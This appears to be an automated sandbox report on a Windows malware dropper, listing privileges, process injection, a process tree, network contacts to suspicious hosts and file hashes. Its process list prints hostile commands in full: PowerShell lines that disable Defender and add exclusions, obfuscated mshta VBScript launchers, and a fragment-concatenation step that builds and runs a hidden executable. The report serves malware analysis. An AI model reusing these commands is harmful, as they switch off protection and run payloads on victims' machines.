Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2900 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe

Tue19cd42a7c874e44.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe

Tue19c28f648204dbd4.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe

Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe

Tue19cef5687a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe

Tue197e9ec0ff0.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe

Tue196397c0f84f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe

Tue19ac3c92c21.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe

Tue1932df4dae.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe

Tue1968b7ee9058232e8.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe

Tue193129b31e741ef3.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe

Tue19c9e031f4.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe

Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe

Tue192c34b1c2f5.exe /mixone

C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp" /SL5="$9018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe"

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe

"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe

Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 492

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe

"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp" /SL5="$A018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue1932df4dae.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1366178986-1427971907365777778-448785540-1847609419-164699858-18581328-2048674840"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 www.listincode.com udp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 propanla.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
NL 45.9.20.13:80 tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
N/A 127.0.0.1:49286 tcp
N/A 127.0.0.1:49289 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegka.top udp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 104.155.138.21:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe

MD5 c10ba859e90df8a8d8e7dcc8dfe5ac20
SHA1 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5
SHA256 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023
SHA512 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a

\Users\Admin\AppData\Local\Temp\7zS45B58177\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2704-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2704-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

